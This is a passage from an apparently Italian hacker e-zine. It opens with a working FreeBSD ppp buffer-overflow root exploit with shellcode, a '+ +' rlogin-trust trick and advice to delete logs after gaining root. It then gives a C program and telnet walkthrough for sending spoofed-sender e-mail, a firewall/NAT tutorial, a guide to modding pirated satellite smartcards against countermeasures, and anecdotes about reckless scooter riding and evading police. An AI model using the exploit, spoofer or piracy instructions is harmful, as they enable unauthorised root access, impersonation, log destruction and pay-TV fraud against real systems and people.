catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
now on to another one, this will be the last one that I'm going to show. Exploitation
script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15.
Works on
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:
#include
#include
#include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
Now that you've gotten root "what's next?" Well the choice is up to you but I would
recommend changing the password before you delete or change anything. To change their
password all you have to do is login via telnet and login with your new account. Then
you just type: passwd and it will ask you for the old password first followed by the
new one. Now only you will have the new pw and that should last for a while you can now
upload you pages, delete all the logs and just plain do your worstJ Psychotic writes
our own exploits and we will be releasing them soon, so keep your eyes open for them.
We recommend that if you are serious about learing ethnical hacking that you download
our Unix Bible.
/===========================::=============================::=================/
/ /Semplice fake e-mail! / sYn
/===========================::=============================::=================/
Esistono diversi modi per inviare una email con l'indirizzo del mittente falso,
questo tipo di e-mail è piu' conosciuta a tutti come fake mail!
In questo art vi spiego brevemente un semplice metodo e vi daro' il sorgente
di un'interessante programma .
Naturalmente come tutti sanno dovremmo sfruttare il servizio SMTP, sono
molti i server che lo abilitano e quelli che usano il Sendmail. Al limite
potremmo ottenere il root scrivendo proprio a lui facendo finta di essere
qualche "illustre" ..ma ormai questo trucco lo usano in pochi...e forse proprio
per questo si potrebbe usare...;
Passiamo alla pratica. Non dobbiamo fare altro che connetterci alla porta 25 del server,
naturalmente tramite /bin/telnet.
darkstar:/# telnet alvo 25
Trying XXX.XXX.XXX.X...
Connected to X.
Escape character is '^]'.
220 XXX ESMTP Sendmail 8.9.3/8.9.3; Sun, 31 Dec 2000 22:26:22 -0300
helo localhost.localhost
250 XXX Hello localhost [127.0.0.1], pleased to meet you
mail from: fhc@senato.gov.br
250 fhc@senado.gov.br... Sender ok
rcpt to: root@localhost
250 root@localhost... Recipient ok
data
354 Enter mail, end with "." on a line by itself
testo della fakemail
.
250 WAA00163 Message accepted for delivery
quit
221 darkstar closing connection
Connection closed by foreign host.
Adesso vi riporto molto semplicemente i comandi che abbiamo dettato,
questi sono i semplici passi:
1 - HELO diamo una sorta di benvenuto al servizio
2 - MAIL FROM: <l'indirizzo falso>
3 - RCPT TO: <indirizzo al quale inviare>
4 - DATA scrivete qui il testo del messaggio
5 - E . lasciate una riga e scrivete un punto
Ed ecco il programma che ho trovato e modificato grazie all'aiuto di un mio
amichetto sconociuto...:
-------------------------------------------------------------------------
/* PROGRAMMA PER L'INVIO DI E-MAILS
* CON INDIRIZZO DI ORIGINE ERRATA.
* syn@hackersat.com
* http://www.hackersat.com/
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define ERROR -1
#define PORT 25
int Mensagem(int Socket);
int main(int argc, char *argv[]){
char Recv[1024], Send[1024];
int Socket, R;
struct hostent *host;
struct sockaddr_in alvo;
if(argc < 4){
printf("Faker - Envia Mails Forjados!\n\n");
printf("Uso: %s [host_alvo] [usuario_alvo] [rementente_forjado]\n\n",argv[0]);
printf("H@ - http://www.hackersat.com/\n");
exit(ERROR);
}
host = gethostbyname(argv[1]);
if(host == NULL){
fprintf(stderr,"Host Desconhecido!\n");
exit(ERROR);
}
alvo.sin_family = host->h_addrtype;
alvo.sin_port = htons(PORT);
alvo.sin_addr = *((struct in_addr *)host->h_addr);
bzero(&(alvo.sin_zero), 8);
Socket = socket(AF_INET, SOCK_STREAM,0);
if(Socket < 0){
perror("Socket");
exit(ERROR);
}
if(connect(Socket,(struct sockaddr * )&alvo, sizeof(alvo)) < 0){
fprintf(stderr,"Erro em connect()!!\n");
close(Socket);
exit(ERROR);
}
bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"HELO localhost.%s\n",argv[1]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta!");
close(Socket);
exit(ERROR);
}
if(!strstr(Recv,"ok")){
printf("1o. Helo risposto OK!:)\n");
}
else{
fprintf(stderr,"Problema con HELO!\n");
close(Socket);
exit(ERROR);
}
bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"MAIL FROM: %s\n",argv[3]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta per MAIL FROM!\n");
close(Socket);
exit(ERROR);
}
if(!strstr(Recv,"ok")){
printf("2o. Mail From risposto OK!:)\n");
}
else{
fprintf(stderr,"Problema con Mail From!\n");
close(Socket);
exit(ERROR);
}
bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
snprintf(Send,1023,"rcpt to: %s\n",argv[2]);
write(Socket,Send,strlen(Send));
if ((R = read(Socket, Recv, sizeof(Recv))) < 0){
fprintf(stderr,"Risposta per Rcpt to!\n");
close(Socket);
exit(ERROR);
}
if(!strstr(Recv,"Recipient ok")){
printf("3o. Rcpt To risposto OK!:)\n");
}
else {
fprintf(stderr,"Problema con RCPT TO!\n");
close(Socket);
exit(ERROR);
}
bzero(Send, sizeof(Send));
bzero(Recv, sizeof(Recv));
Mensagem(Socket);
return 0;
}
#define max(x,y) ((x)>(y)?(x):(y))
int Mensagem(int Socket){
char envia[4056], recebe[1024], buffer[4056];
fd_set rset;
int R, maxfd;
sleep(1);
bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));
printf("Digite sua Mensagem\n");
strcpy(envia,"DATA\n");
write(Socket, envia, strlen(envia));
if ((R = read(Socket, recebe, sizeof(recebe))) < 0){
fprintf(stderr,"Problema con DATA!\n");
close(Socket);
exit(ERROR);
}
if(!strstr(recebe,"Enter mail")){
bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));
for (;;){
FD_SET(fileno(stdin), &rset);
FD_SET(Socket, &rset);
maxfd = max(fileno(stdin), Socket) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(envia, sizeof(envia));
while(!strstr(envia,"FIM")){
fgets(buffer, sizeof(envia) - 2, stdin);
strcat(envia,buffer);}
strcat(envia,"\n.\n");
write(Socket, envia, strlen(envia));
}
if (FD_ISSET(Socket, &rset))
{
bzero(recebe, sizeof(recebe));
if ((R = read(Socket, recebe, sizeof(recebe))) == 0){
printf("ok!\n");
}
}
else
{
return (ERROR);
}
}
}
bzero(envia, sizeof(envia));
bzero(recebe, sizeof(recebe));
strcpy(envia,"QUIT");
write(Socket, envia, strlen(envia));
if ((R = read(Socket, recebe, sizeof(recebe))) < 0){
fprintf(stderr,"Ctrl + C!\n");
close(Socket);
exit(ERROR);
}
printf("Fakemail inviata con successo!!\n");
return 0;
}
------------------------------------------------------------------------
Adesso vi mostro un piccolo mio "vecchio" esempio di fakemail con un'analisi + accurata.
Sicuramente la maggiorparte di voi ha incontrato o configurato un programma in internet
per l'invio di posta ...da questo deduciamo che è essenziale conoscere il nome di un certo
SMTP server ovvero il server dedicato alle outgoing mail oltre ad alcune
informazioni sull'utente.
Siccome tuttavia a noi utenti di Linux piace molto lavorare il piú possibile
senza programmi che facciano da tramite tra noi e l'azione che vogliamo
eseguire, vediamo in dettaglio cosa accade quando ci mettiamo in contatto con questo server.
SMTP SERVER: Quando deve spedire un messaggio di posta elettronica il nostro
programmino si collega alla porta 25 dell'SMTP SERVER e fornisce alcuni comandi
che ora vedremo nel dettaglio. Proviamo dunque a collegarci alla porta 25 di un
qualsiasi server SMTP, per esempio sibervision.com.
Riporto di seguito una sessione qualsiasi
telnet sibervision.com 25
Connected to sibervision.com.
Escape character is '^]'.
220 ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST)
HELO default
250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you
MAIL FROM: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Sender ok
RCPT TO: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
subject: Ma sei scemo che ti mandi i messaggi da solo??
in effetti mi sento molto solo :-)
.
250 TAA18303 Message accepted for delivery
QUIT
Vediamo un po in dettaglio cosa è successo...ovviamente le linee precedute da
numeri sono le risposte dell'host a cui mi sono collegato.
Non appena entriamo nella porta 25 ci viene comunicato che in quella porta è
funzione una versione di Sendmail, proprio il programma dedicato alla consegna
di messaggi di posta elettronica. Come sapete, questo fatto della versione di
sendmail ci è molto utile sopratutto se vogliamo bucare il server!
Con il comando HELO ci presentiamo al server, infatti serve solo a comunicare
al server che siamo pronti. A questo punto diciamo tramite il comando MAIL FROM:
quale indirizzo va inserito nel campo From:, quello al quale poi verranno inviate
eventuali repliche, dopodiche' con RCPT TO: diciamo a sendmail a chi deve
recapitare questa mail e tramite il comando DATA inseriamo rispettivamente il
subject del messaggio, il testo vero e proprio ed un punto da solo su una linea
per comunicare la fine del messaggio.
A questo punto la linea 250 TAAA18303 Message... ci dice che il messaggio con
TUTTI i dati di chi lo spedisce è stato memorizzato e verrá recapitato al piú presto .
Bene, spedito il messaggio andiamo a controllare con Pine (programma che spedisce
messaggi tramite SMTP) che cosa è successo:
Se ritiriamo la posta e diciamo a Pine di visualizzare tutti i campi vediamo quanto segue:
X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it
Return-Path: pd.gabanaz@iol.it
Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it
(8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100
From: pd.gabanaz@iol.it
Received: from swrm250-126.iol.it [194.21.250.126] by www15.clever.net
(8.8.5/8.6.9) with SMTP id TAA18303 for pd.gabanaz@iol.it; Wed, 19 Mar 1997
19:55:40 -0500 (EST)
Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Message-Id: <199703200055.taa18303@www15.clever.net>
subject: Ma sei scemo che ti mandi i messaggi da solo??
in effetti mi sento molto solo :-)
ebbene abbiamo spedito una e-mail direttamente dalla porta 25 del nostro SMTP host!
È facile verificare che semplicemente cambiando alcuni dati in fase di
impostazione possiamo spedire quella che viene comunemente denominata fake mail,
ovvero messaggi "truccati di posta elettronica"...anziché ripetere il processo
vi faccio vedere semplicemente il log di una sessione in cui ho spedito, sempre
a me stesso, una fake-mail:
telnet sibervision.com 25
Connected to sibervision.com.
Escape character is '^]'.
220 ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST)
HELO vediamo.che.succede.com
250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you
MAIL FROM: hey@funziona
250 hey@funziona... Sender ok
RCPT TO: pd.gabanaz@iol.it
250 pd.gabanaz@iol.it... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
subject: sembra carino, no?
ciao ciao
.
250 TAA18303 Message accepted for delivery
QUIT
221 www15.clever.net closing connection
E questo è al solito il risultato:
X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it
Return-Path: hey@funziona
Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it
(8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100
From: hey@funziona
Received: from vediamo.che.succede.com (swrm250-126.iol.it
[194.21.250.126]) by www15.clever.net (8.8.5/8.6.9) with SMTP id TAA18303
for pd.gabanaz@iol.it; Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST)
Message-Id: <199703200055.taa18303@www15.clever.net>
subject: sembra carino, no?
ciao ciao
Come vedete questa volta "sembra" che la lettera sia stata spedita dall'host:
vediamo.che.succede.com
e che il mittente sia un certo:
hey@funziona
Ovviamente all'utente piú esperto non sfuggirá il fatto che in realtá accanto a:
vediamo.che.succede.com
si trova esplicitamente il nome di un provider che non coincide proprio con quel che
vorremmo sembrasse, peró tenete presente che quasi mai si guardano tutti i campi di
una mail, quindi per fare qualche scherzetto innocente andrá piú che bene !
Una ultima nota: in tutti i messaggi compare un identificatore di messaggio, ebbene
tramite quello, facendone eventualmente richiesta al sysop, chiunque abbia spedito
fakemail è rintracciabile, poiché in esso sono racchiusi data, ora e IP di chi si
collega, ovvero tutti i dati necessari per decodificare la provenienza del messaggio.
Inoltre a seconda delle versioni di Sendmail che compaiono possono esservi alcune
modificazioni; potrebbero per esempio comparire al posto del campo From un
Apparently from o anche un Apparently to, tuttavia vale quanto sopra, cioé
difficilmente si guarda a questi campi; in alcune implementazioni di Sendmail
sono presenti anche i comandi di help, quindi una volta entrati alla porta 25
provate il comando HELP per vedere se è disponibile, ed eventualmente date un'occhiata
alle possibilitá che avete.
è tutto
Parti di questo testo mi sono state inviate. Prima rielaborate.
sYn syn@hackersat.com www.hackersat.com
/===========================::=============================::=================/
/ /Costruire un bunker linux: Firewalling di base / kEwL /
/===========================::=============================::=================/
Costruire un Bunker Linux: Firewalling di Base
di Rafael Coninck Teigao
tradotto da kEwL`
ultimo aggiornamento Lunedì, 8 Maggio 2000
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Questo articoo presenta un modo di convertire ogni separata macchina che hai in
una rete dietro un gateway, utilizzando il Network Address Translation (NAT), e
le funzioni di firewalling presenti in Linux.
Alcune nozioni di base per essere indirizzato. Questo non è un host ordinario, e
non dovrebbe essere visto. Questo host sarà usato solo per il firewalling e NAT,
e nient'altro. Questo significa che non dovrai eseguire altri servizi. Inoltre,
se stai per reindirizzare dei servizi in una macchina all'interno, assicurati
che il servizio non abbia molte vulnerabilità, e che sia aggiornato. Se non
tieni conto di queste cose, il tuo firewall potrebbe diventare inutile.
Le ultime versioni del kernel di Linux non sono sicuramente le versioni più
staili e affidabili. Se la tua macchina non necessita gli ultimi drivers,
scarica e installa un kernel stabile, sicuro e ben testato; il kernel 2.0.38 è
il migliore. Devi abilitare l'IP Forwarding, l'IP Masquerading, l'IP
Firewalling, l'IP Transparent Proxying e l'IP Routing. Se stai avendo dei dubbi
a compilare questo kernel, dai uno sguardo a
http://www.suse.de/~florian/kernel+egcs.html. Questo sito ha una patch per
compialre questo kernel con egcs.
Ora che hai installato e compilato un kernel stabile, e letto e messi in pratica
gli articoli nominati precedentemente, andiamo a configurare il firewall. Ho
creato una serie di shell scripts che ti aiuteranno nella configurazione di
base. Come li presento, spiegherò cosa fanno, come usarli e dove metterli. Per
piacere, ricordati che penso tu stia usando RedHat e che le directory potrebbero
essere diverse in altre distribuzioni.
Inoltre, dovresti cambiare il blocco di indirizzi interni (ho usato 10.x.x.x) in
quello che vuoi. Usare indirizzi IP non utilizzati nella rete interna è una
buona idea per un certo numero di ragioni, l'ultima delle quali che non avrai
nessun problema di collisione fra IP interni ed esterni.
File: firewall
Path: /etc/rc.d/init.d/
# Svuota il firewall
ipfwadm -F -f
ipfwadm -I -f
ipfwadm -O -f
#
# setta IP packet Accounting e Forwarding
#
# Forwarding
#
# DENY tutti i servizi
ipfwadm -F -p deny
# E ACCEPT tutte le connessioni dell'interfaccia interna
ipfwadm -F -a accept -m -P all -S 10.0.0.0/8
#
# setta IP pachet per Transparent Proxying
# usa questo SOLO se hai SQUID sulla macchina
#
# Entrata
#
# ACCEPT tutti i servizi
ipfwadm -I -p accept
# Questo reindirizzerà tutte le connessioni verso l'interno al tuo proxy
ipfwadm -I -a accept -P tcp -S 10.0.0.0/8 -D 0.0.0.0/0 80 -r 3128
#
# Setta a DENY tutte le connessioni da un IP
#
# Entrata
#
# ipfwadm -I -a deny -P all -S IPnumber
Eseguilo all'avvio.
Editare /etc/hosts.allow e /etc/hosts.deny è una buona idea. Dovrebbero essere
simili a questi:
File: hosts.allow
Path: /etc/
ALL: 10.
22: ALL
80: ALL
File: hosts.deny
Path: /etc/
ALL: ALL
In questo modo stai accettando ogni connessione in entrata alla porta SSH e
HTTP, connessioni da 10.x.x.x per lavorare con ogni demone installato sul
firewall, e rifiutando tutte le altre connessioni.
I prossimi script sono usati per controllare se tutto è in esecuzione, e
cercando di risolvere semplici problemi come se per esempio cade un'interfaccia
o il masquerade proxy smette di lavorare.
File: crontab --> modificalo per aggiungere queste linee (crontab -e)
Path: /etc/
0-59 * * * * root /usr/local/gateway/bin/check-ALL-masq
0-59 * * * * root /usr/local/gateway/bin/check-ALL-eth
File: check-ALL-masq
Path: /usr/local/gateway/bin/
#!/bin/sh
/usr/local/gateway/bin/check-CU_Seeme `lsmod | awk '{print $1}' | grep
ip_masq_cuseeme`
/usr/local/gateway/bin/check-FTP `lsmod | awk '{print $1}' | grep ip_masq_ftp`
/usr/local/gateway/bin/check-IRC `lsmod | awk '{print $1}' | grep ip_masq_irc`
/usr/local/gateway/bin/check-Quake `lsmod | awk '{print $1}' | grep
ip_masq_quake`
/usr/local/gateway/bin/check-RealPlayer `lsmod | awk '{print $1}' | grep
ip_masq_raudio`
/usr/local/gateway/bin/check-VDOLive `lsmod | awk '{print $1}' | grep
ip_masq_vdolive`
File: check-CU_Seeme; check-FTP; check-IRC; check-Quake; check-RealPlayer;
check-VDOLive
Path: /usr/local/gateway/bin/
#!/bin/sh case "$1" in
OPTION_1)
exit 0
esac
/usr/local/gateway/bin/solve-ALL-masq OPTION_2
Dove OPTION_1 e OPTION_2 dovrebbero essere prese dlla tabella sottostante.
Ricorda che devi creare 6 files differenti.
File OPTION_1 OPTION_2
check-CU_Seeme ip_masq_cuseeme cuseeme
check-FTP ip_masq_ftp ftp
check-IRC ip_masq_irc irc
check-Quake ip_masq_quake quake
check-RealPlayer ip_masq_raudio raudio
check-VDOLive ip_masq_vdolive vdolive
File: solve-ALL-masq
Path: /usr/local/gateway/bin/
#!/bin/sh
case "$1" in
all)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_cuseeme.o
modprobe -s ip_masq_ftp.o
modprobe -s ip_masq_irc.o
modprobe -s ip_masq_quake.o
modprobe -s ip_masq_raudio.o
modprobe -s ip_masq_vdolive.o
;;
cuseeme)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_cuseeme.o
;;
ftp)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_ftp.o
;;
irc)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_irc.o
;;
quake)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_quake.o
;;
raudio)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_raudio.o
;;
vdolive)
cd /lib/modules/2.0.38/ipv4
modprobe -s ip_masq_vdolive.o
;;
*)
echo ""
echo "Usage: solve-ALL-masq {all|cuseeme|ftp|irc|quake|raudio|vdolive}"
echo ""
exit 1
esac
File: check-ALL-eth
Path: /usr/local/gateway/bin/
#!/bin/sh
/usr/local/gateway/bin/check-ETH0 `ifconfig | awk '{print $1}' | grep eth0`
/usr/local/gateway/bin/check-ETH1 `ifconfig | awk '{print $1}' | grep eth1`
File: check-ETH0; check-ETH1
Path: /usr/local/gateway/bin/
#!/bin/sh
case "$1" in
eth0)
exit 0
esac
/usr/local/gateway/bin/solve-ALL-eth eth0
Cambia eth0 in eth1 per creare entrambi i files.
File: solve-ALL-eth
Path: /usr/local/gateway/bin/
#!/bin/sh
case "$1" in
all)
/etc/rc.d/init.d/network
restart
;;
eth0)
echo ""
echo "Reinitializing eth0"
echo ""
/sbin/ifup eth0
;;
eth1)
echo ""
echo "Reinitializing eth1"
echo ""
/sbin/ifup eth1
;;
*)
echo ""
echo "Usage: solve-ALL-masq {all|eth0|eth1}"
echo ""
exit 1
esac
Dopo di ciò, hai una firewall con il masquerading.
Passi finali: scarica, installa e impara ad usare dei tools che ti aiuteranno a
gestire e risolvere problemi futuri con il tuo firewall.
Sniffer: il miglior modo di risolvere i problemi di rete. Gli sniffers di
pacchetti ti mostrano il traffico sulla tua rete. Il miglior sniffer è Sniffit,
disponibile con la documentazione a:
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
Redirect: questo tool è usato per reindirizzare le connessioni che vengono da un
IP e un porta verso un altro IP e un'altra porta. Poi usare questo sul firewall
per reindirizzare le connessioni su una macchina interna, o idealmente, su una
macchina che non sta dietro al firewall. Questo ti permetterà di avere i servizi
accessibili all'esterno, senza aver bisogno di farli passare attraverso un
firewall. Il tool che uso è chiamato rinet e può essere trovato, insieme alla
documentazione, a: http://www.boutell.com/rinetd/.
Monitoraggio dell'Utilizzo di Rete: E' molto importante sapere quanto e come è
utilizzta la tua rete, così puoi fare dei piani sull'upgrading, capire i bisogni
dei tuoi clients e analizzare il traffico di rete. Un tool che è tra i più
diffusi è chiamato NTop. E' simile al comando Unix top e ha interfaccia testuale
e web based. Puoi trovarlo a: http://www.ntop.org/.
Proxy: la maggior parte degli amministratori vogliono installare un server
proxy, per ridurre il lavoro di banda che si ha quando le persone accedono a una
pagina web. Il modo più facile di fare ciò è settare un Transparent Proxy sulla
macchina Firewall/NAT. Nella configurazione del firewall c'è una regola sul
Transparent Proxying. Se lo setti, dai uno sguardo a Squid, il proxy server più
diffuso: http://www.squid-cache.org/.
Altre risorse NAT: ci sono molte pagine web su NAT, e queste possono aiutarti se
ci sono problemi descritti in questo documento, o se semplicemente vuoi maggiori
informazioni:
Linux IP Masquerade HOWTO :
http://www.linuxdoc.org/HOWTO/IP-Masquerade-HOWTO.html.
IP Masq ICQ : http://members.tripod.com/~djsf/masq-icq/.
IP Masquerade Application Collection : http://members.home.net/ipmasq/.
TkMasqdialer : Controlla le connessioin PPP su un server Masq:
http://www.midcoast.com.au/~mvoase/tkmasq.html.
Server HTTP: il server Apache ha opzioni per settare virtual hosts e anche per
reindirizzare connessioni HTTP in entrata. Il miglior modo di usare un host
interno come HTTP server per il mondo è usare Apache con il reindirizzamento
all'host interno: http://www.apache.org/.
Questo è probabilmente tutto quello che dovresti sapere sui server Firewall/NAT
se non vuoi complicarti la vita nella tua configurazione. Spero che farai buon
uso di questi scripts che ho presentato, e che li trovi facili da modificare per
adattarli alla tua rete. Ho usato questa configurazione per 2 anni su molte
macchine e nessuna ha mai subito un'intrusione - e i miei logs dicono che la
gente ci ha provato. Questo non significa che è impossibile entrarvi, poichè
qualcuno potrebbe trovare un errore e sfruttarlo. Quindi dovresti tenere sempre
un occhi aperto e leggere i documenti di sicurezza sul tuo sistema operativo e
sulle applicazioni che usi, e aggiornare sempre tutto.
/===========================::=============================::=================/
/ /Inserimento Zener / sYn /
/===========================::=============================::=================/
Lo abbimo testato io è un mio amico, abbiamo fino ad ora riscontrato buoni risultati.
Bene cosa è lo zener ? Lo zener non è altro che un semplice diodo.
Che messo tra alcuni determinati piedini dell'eeprom e chip riescono a filtrare
i dati maliziosi che vengono inviati dai dirigenti per chi usa le tanto
conosciute wafercard piratate. Gli effetti dell'invio di questi dati, +
conosciuto come la "bomba", sono quello dell'alterazione dei codici, così
da non poter far vedere nulla! E per noi questo è molto molto fastidioso....
Quindi passiamo subito a quello che dovete fare.
In un comune negozio di elettronica dovreste acquistare un diodo mezzo W/12 V (mezzo
watt /12 volt), con questo tipo di diodo abbiamo sperimentato noi. Adesso con un
normale saldatore dobbiamo saldare sui piedini 4 - 4 di chip ed eeprom (rispettivamente).
Senza troppe parole vi ho reso facile il compito con un piccolo disegnino !
\--------------\
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\ \
\||||||||| ||||\
\||||||||| ||||\
\ | | \
\ |_==_| \
\ zener \ (osservate bene i piedini)
\--------------\
Penso di essere stato + chiaro possibile.
Scusatemi se ho sbagliato qualcosa nella spiegazione e vi invito a scrivermi per qualsiasi
incomprensione.
sYn syn@hackersat.com www.hackersat.com
/===========================::=============================::=================/
/ /Modifica alla Scarabeo (Aprilia) / Jrash /
/===========================::=============================::=================/
Ciao ragazzi sono sempre io, Jrash, in questo articoletto vorrei
parlarvi di una cosetta molto sfiziosa che abbiamo fatto io
e il mio amico Emilio durante quest'estate...
credo che tutto cio che abbiamo fatto non l abbia fatto mai nessuno.....
Percio vi invito a leggere tutto e poi alla fine, se ne avete le
capacita di provare anche voi a farlo...
Mamma mia, solo al pensiero mi viene la voglia di rifarlo....
che bella sensazione, una cosa davvero stupenda........
Era il diciotto luglio dell estate 2000/2001, una giornata non
molto bella poiche c era un po' di vento ed allora io e il mio
amico Emilio decidemmo di non andare al mare e di andare nel suo
garage a fare qualche esperimento sui nostri motorini....
Gia da come spero avete capito il mio motorino è un SR preparato,
cioè da competizione che sulle strade della citta' è davvero un bolide...
Allora mentre andavamo nel garage di Emilio io mi divertivo a
impennare su una sola ruota e ha fare il "pazzo" nel traffico, emilio
faceva lo stesso con il suo direi "grande" scarabeo dell aprilia,
sempre da competizione, con una ripresa pari a quella di uno dei
migliori 125, uno scooter veramente fantastico che solo pazzi come
noi hanno il coraggio di guidare...
Arrivati una volta nel garage poggiamo gli scooter sul pavimento e
muniti di chiavi iniziammo a smontare marmitta, ruote , sospensioni
e carrozzeria.
Una volta fatto cio' non sapevamo cosa fare e cosi andammo a comprarci
un gelato; per la strada vedemmo uno scooter un motorino direi un
po' strano che non avevo mai visto prima d ora, se non mi sbaglio
era della YAMAHA....boh non mi ricordo..
Comunque questo motorino ci aveva colpito molto e cosi andammo di
corsa al garage di Emilio, e decidemmo di mettere le route dell sr
allo scarabeo, e quelle dello scarbeo all'sr...
Cosi ci mettemmo al lavoro, un duro lavoro direi, non tanto per lo
scarabeo ma per l sr perche per metterci la ruota dello scarabeo
dovevamo smontare anche parafango e tutto il carter oil, una vera
seccatura , ma ne valeva la pena.
Montate le ruote ci accingemmo a fare lo stesso con le sospensioni:
qui la cosa si complica ancora di piu', infatti dovevamo smontare
tutta la carrozzeria sospensioni, di nuovo la ruota davanti i freni
e tutto il resto.
Dopo tre ore di duro lavoro anche l operazione sospensioni era
completata.
I I motorini dopo questa modifica erano davvero dei mostri, erano
conciati in tal modo che se ci prendeva la polizia ci arrestavano.
Durante quei momenti ero molto felice ed emozionato, subito io e il
mio amico andammo nella costiera amalfitana, essendo di salerno, per
provare i nostri motorini.
I motorini avevano caratteristiche spaventose, ma anche molti difetti
lo scarabeo era fenomenale, poiche pur avendo un assetto bassissimo
nelle curve aveva una resa stupenda, per non parlare poi delle altre
prestazioni;
il mio scooter non era molto stabile nelle curve , ma nel traffico
assumeva una manovrabilita' eccezionale soprattutto nel cosidetto
Zig-zag.....come mi piacerebbe rifarlo....a cosa darei.....lol
Credo che voi pensiate che io sia un pazzo, si questo pure è vero,
ma non bisogna escludere che io ed Emilio siamo dei grandi.......sfido
chiunque a fare quello che ho fatto io.
Beh...ora vi saluto perche non so cosa dirvi piu.....
Se volete scrivermi la mia E-mail gia la conoscete....
Okk vi saluto alla prossima.......ByEzZ.....
Ringrazio gli amici di IRC e non....
Giadina ti amo:))
w w w . h a c k e r s a t . c o m [Jrash]°
/===========================::=============================::=================/
/ /L'inseguimento / Jrash /
/===========================::=============================::=================/
Ciao gentaglia, sono Jrash il matto; in questo articolo che giudico molto sfizioso
vi parlero' di una cosa accaduta a mio fratello maggiore un paio di anni fa'.
Mio fratello si chiama genny, ha 9 anni piu di me e fino a poco fa' possedeva
una vespa 50. All eta' di 16 anni, cioè ben 10 anni fa'girava con la sua vespa
per le strade della mia citta', Salerno, senza casco(il casco allora non
andava di moda). Quando giro a un' angolo della strada , guarda un po'
la sfiga incontro'due chips (poliziotti sulle moto) davanti a un bar.
Questi appena videro mio fratello senza casco mostrarono la paletta per fallo accostare
per poi sequestrargli la vespa. Mio fatello che non è un fesso fece finta
di accostare per poi partire alla massima velocita'. Qui viene il bello...seguitemi
che inizia l inseguimento.I poliziotti non stando al fatto accesero la sirena e
iniziarono a seguirlo. L'inseguimento duro per ben 40 minuti di puro fuoco .
Mio fratello per prima cosa si fece un tratto di strada sul marciapiede e poi scese
un paio di gradini con la sua vespa; dopo essersi fermato per vedere dove erano andati
a finire i chips, continuo nella sua fuga.
In quel giorno la sfiga lo perseguitava : per il cammino incontro un'altra coppia
di poliziotti che stavano facendo il posto di blocco....Mio fratello non si fermo
